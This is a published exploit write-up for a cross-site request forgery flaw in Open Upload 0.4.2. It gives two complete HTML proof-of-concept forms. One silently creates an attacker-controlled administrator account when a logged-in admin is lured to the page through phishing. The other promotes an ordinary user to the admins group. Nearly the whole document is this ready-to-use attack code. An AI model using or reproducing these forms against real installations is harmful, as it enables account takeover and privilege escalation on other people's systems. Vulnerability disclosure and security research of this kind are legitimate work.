65 lines
No EOL
3.1 KiB
Text
65 lines
No EOL
3.1 KiB
Text
================================================================================================================
|
|
Open Upload 0.4.2 Remote Admin Add CSRF Exploit and Changing Normal user permission
|
|
================================================================================================================
|
|
# Exploit Title : Open Upload 0.4.2 Remote Admin Add CSRF Exploit
|
|
# Exploit Author : Vinesh Redkar (@b0rn2pwn)
|
|
# Email : vineshredkar89[at]gmail[d0t]com
|
|
# Date: 21/07/2016
|
|
# Vendor Homepage: http://openupload.sourceforge.net/
|
|
# Software Link: https://sourceforge.net/projects/openupload/
|
|
# Version: 0.4.2
|
|
# Tested on: Windows 10 OS
|
|
|
|
Open Upload Application is vulnerable to CSRF attack (No CSRF token in place) meaning
|
|
that if an admin user can be tricked to visit a crafted URL created by
|
|
attacker (via spear phishing/social engineering).
|
|
|
|
Once exploited, the attacker can login as the admin using the username and the password he posted in the form.
|
|
|
|
======================CSRF POC (Adding New user with Admin Privileges)==================================
|
|
CSRF PoC Code
|
|
<html>
|
|
<head>
|
|
<title>Remote Admin Add CSRF Exploit</title>
|
|
</head>
|
|
<H2>Remote Admin Add CSRF Exploit by b0rn2pwn</H2>
|
|
<body>
|
|
<form action="http://127.0.0.1/openupload/index.php" method="POST">
|
|
<input type="hidden" name="action" value="adminusers" />
|
|
<input type="hidden" name="step" value="2" />
|
|
<input type="hidden" name="adduserlogin" value="attacker" />
|
|
<input type="hidden" name="adduserpassword" value="attacker" />
|
|
<input type="hidden" name="adduserrepassword" value="attacker" />
|
|
<input type="hidden" name="addusername" value="attacker" />
|
|
<input type="hidden" name="adduseremail" value="attacker@gmail.com" />
|
|
<input type="hidden" name="addusergroup" value="admins" />
|
|
<input type="hidden" name="adduserlang" value="en" />
|
|
<input type="hidden" name="adduseractive" value="1" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html>
|
|
|
|
======================CSRF POC (Changing privileges from normal user to administer)==================================
|
|
|
|
<html>
|
|
<head>
|
|
<title>Change privilege normal user to administer CSRF Exploit</title>
|
|
</head>
|
|
<H2>Change privilege normal user to administer CSRF Exploit by b0rn2pwn</H2>
|
|
<body>
|
|
<form action="http://127.0.0.1/openupload/index.php" method="POST">
|
|
<input type="hidden" name="action" value="adminusers" />
|
|
<input type="hidden" name="step" value="3" />
|
|
<input type="hidden" name="login" value="normal user" />
|
|
<input type="hidden" name="edituserpassword" value="" />
|
|
<input type="hidden" name="edituserrepassword" value="" />
|
|
<input type="hidden" name="editusername" value="normaluser" />
|
|
<input type="hidden" name="edituseremail" value="normaluser@gmail.com" />
|
|
<input type="hidden" name="editusergroup" value="admins" />
|
|
<input type="hidden" name="edituserlang" value="en" />
|
|
<input type="hidden" name="edituseractive" value="1" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html> |